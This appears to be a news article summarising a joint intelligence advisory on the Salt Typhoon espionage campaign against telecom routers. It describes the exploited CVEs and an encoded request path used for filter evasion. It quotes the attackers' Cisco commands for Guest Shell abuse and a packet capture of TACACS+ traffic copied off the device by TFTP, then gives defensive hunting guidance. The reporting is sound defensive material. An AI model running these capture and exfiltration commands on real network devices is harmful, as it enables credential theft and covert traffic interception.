Seventeen intelligence and cybersecurity agencies from the United States, United Kingdom, Australia, and allied nations issued an extraordinary joint advisory on August 28, 2025, exposing a multi-year campaign by Chinese state-sponsored hackers to infiltrate core internet routers and build a global espionage network. The operation, tracked as Salt Typhoon, OPERATOR PANDA, RedMike, and UNC5807, has targeted telecommunications providers, governments, and critical infrastructure worldwide, hijacking backbone and edge devices to harvest credentials, mirror traffic, and establish covert collection channels.

The advisory—co-sealed by agencies including the NSA, CISA, FBI, ASD’s ACSC, NCSC-UK, and Germany’s BND—details how the threat actors have systematically exploited publicly known vulnerabilities since 2021, avoiding zero-days in favor of high-impact CVEs in Cisco, Palo Alto Networks, and Ivanti gear. The result is a persistent, deeply embedded espionage capability that threatens the confidentiality of subscriber metadata, authentication exchanges, and entire network flows.

The Playbook: Exploiting Known Flaws for Initial Access

The attackers rely on a familiar set of CVEs, chaining them to gain administrative control of exposed management interfaces and VPN gateways. Among the most abused:

  • CVE-2023-20198 / CVE-2023-20273 (Cisco IOS XE Web UI): A critical authentication bypass that lets unauthenticated attackers create privileged accounts, combined with a privilege escalation to achieve root-level code execution. The advisory notes the actors obfuscated requests by double-encoding paths, using variants like /%2577eb%2575i_%2577sma_Http to slip past simple filters.
  • CVE-2018-0171 (Cisco Smart Install): A notorious remote code execution flaw still present on unpatched, end‑of‑life devices. Multiple nation‑state groups have weaponized it, and the advisory urges immediate deactivation or patching.
  • CVE-2024-3400 (Palo Alto GlobalProtect): A perfect‑10 severity command injection that enables unauthenticated RCE when GlobalProtect is enabled on certain PAN‑OS versions. Palo Alto’s PSIRT has confirmed active exploitation.
  • CVE-2024-21887 (Ivanti Connect Secure / Policy Secure): A web‑component injection commonly chained after the CVE-2023-46805 authentication bypass, allowing full device takeover.

These CVEs represent low‑hanging fruit that the actors scan for at scale, compromising thousands of internet‑exposed devices across IP ranges and revisiting them for follow‑on operations.

Living Off the Router: Persistence and Evasion

Once inside a device, the attackers abuse native features to blend in and stay hidden. Their hallmark is turning trusted, built‑in capabilities into spyware without deploying custom malware.

Guest Shell and Container Abuse
On Cisco IOS XE and NX‑OS platforms, the actors enable Guest Shell—a Linux container that runs Python, native tools, and even package managers like pip or yum. They use it to stage exploit scripts (e.g., siet.py for Smart Install), parse captured data, and laterally move within the environment. Because Guest Shell uses the management VRF and may not be fully monitored by traditional syslog, activity inside the container often goes unnoticed. The advisory documents commands such as:

guestshell enable
guestshell run bash
./cmd3 <encrypted_config>

And later, to clean up:

guestshell disable
guestshell destroy

Non‑Standard Ports and ACL Tweaks
They enable SSH servers on high, non‑default ports (patterns like 22x22 or xxx22) and alter ACLs to explicitly permit actor‑controlled IPs, often naming the entry access‑list 20. HTTP/HTTPS management services are reconfigured to listen on ports like 18xxx, avoiding signature‑based detection.

IOS XR Host OS Compromise
On Cisco IOS XR devices, the actors activate the sshd_operns service on TCP/57722, create local users, and add them to /etc/sudoers to gain full root on the Linux host. This grants unfettered access to the underlying operating system, bypassing the IOS CLI entirely.

SNMP and AAA Manipulation
They issue SNMP SET requests to redirect TACACS+ and RADIUS servers to attacker‑controlled IPs, capturing authentication traffic. SNMPv1/v2 community strings like “public” and “private” are routinely exploited. The actors also enable SNMP‑based configuration changes and use SNMPwalk to enumerate devices across shared communities.

Stealing Secrets with Built‑In Packet Capture

The campaign’s most insidious technique is the abuse of native packet capture (PCAP) and traffic mirroring. The actors execute commands like:

monitor capture mycap interface GigabitEthernet0/1 both
monitor capture mycap match ipv4 protocol tcp any any eq 49
monitor capture mycap start
monitor capture mycap export bootflash:tac.pcap
copy bootflash:tac.pcap tftp://10.0.0.1/tac.pcap

These sequences target TCP port 49 (TACACS+) and store captures with names like mycap.pcap, tac.pcap, and 1.pcap. Because TACACS+ shared secrets are frequently stored using Cisco Type 7 reversible obfuscation, capturing authentication packets allows offline decryption of administrator credentials.

SPAN, RSPAN, and ERSPAN sessions are configured to mirror entire VLANs or customer traffic to VPSs or compromised intermediate routers, creating a parallel, invisible surveillance network.

Data leaves the environment not through noisy C2 channels but via peering interconnects, GRE/IPsec tunnels, and protocol‑misuse. The actors stage encrypted archives on the device and transfer them using custom SFTP clients written in Go. The advisory includes hashes and YARA rules for binaries named cmd1, cmd3, new2, and sft. For example:

File Name MD5 Hash Build Path
cmd3 eda9ae70... C:/work/sync/cmd/cmd3/main.go
cmd1 33e692f4... C:/work/sync_v1/cmd/cmd1/main.go

These clients accept an encrypted configuration string and are used to push captures to FTP/TFTP staging hosts. Multi‑hop pivot tools like STOWAWAY construct chained, encrypted relays that provide operators with interactive shells and SOCKS5 proxies, further obscuring origin.

A Prioritized Detection and Mitigation Playbook

The advisory offers concrete threat‑hunting guidance for network defenders. Immediate actions include:

Patch and Harden
- Prioritize vendor hotfixes for all listed CVEs. Disable Cisco Smart Install (no vstack), GlobalProtect where possible, and Ivanti remote access if unpatched.
- Place all management services (SSH, SNMP, syslog) in a dedicated management VRF with strict egress filtering and CoPP.

Log and Monitor
- Forward device syslog, AAA command accounting, and Guest Shell logs to an immutable SIEM. Alert on:
- Commands like monitor capture … start or guestshell enable.
- New TACACS+/RADIUS server IPs pointing off‑net.
- Unexpected SNMP SETs, SPAN/ERSPAN session definitions, or GRE/IPsec tunnels.

Hunt for Indicators
- Search for TCP/57722 listener on IOS XR hosts and audit sshd_operns status.
- Deploy YARA rules for SFTP binaries (cmd1, cmd3, etc.) and monitor for PCAP file names (mycap, tac.pcap).
- Audit BGP filters and routing tables for unauthorized peerings or static routes.

Coordinate Eviction
- Partial remediation can tip active operators. Coordinate simultaneous eviction across all compromised nodes and involve law enforcement where required.

What This Means for Windows and Enterprise Networks

While the attacks target routers, the downstream risk to Windows environments is severe. Captured TACACS+ and RADIUS credentials often unlock administrative access to switches, firewalls, and, critically, domain infrastructure. A compromised core router can redirect or capture Active Directory traffic, VPN authentication, and internal management flows—effectively acting as a man‑in‑the‑middle for the entire enterprise.

Windows administrators should treat this advisory as a mandate to verify that all edge devices are patched and that authentication traffic is encrypted end‑to‑end. Implement network segmentation that isolates management planes, enforce multi‑factor authentication for router administration, and ensure that device logs are shipped off‑box to a secured collector. The presence of a dual‑use SFTP binary or an unexpected container on a router should trigger an immediate incident response, as the actors may already have footholds inside the broader network.

The CISA advisory, combined with confirmations from Cisco, Palo Alto, and Ivanti, provides the most complete picture yet of a state‑sponsored campaign that has turned the internet’s plumbing into an espionage tool. For defenders, the message is clear: routers are not dumb pipes—they are high‑value targets that must be locked down with the same rigor as any domain controller.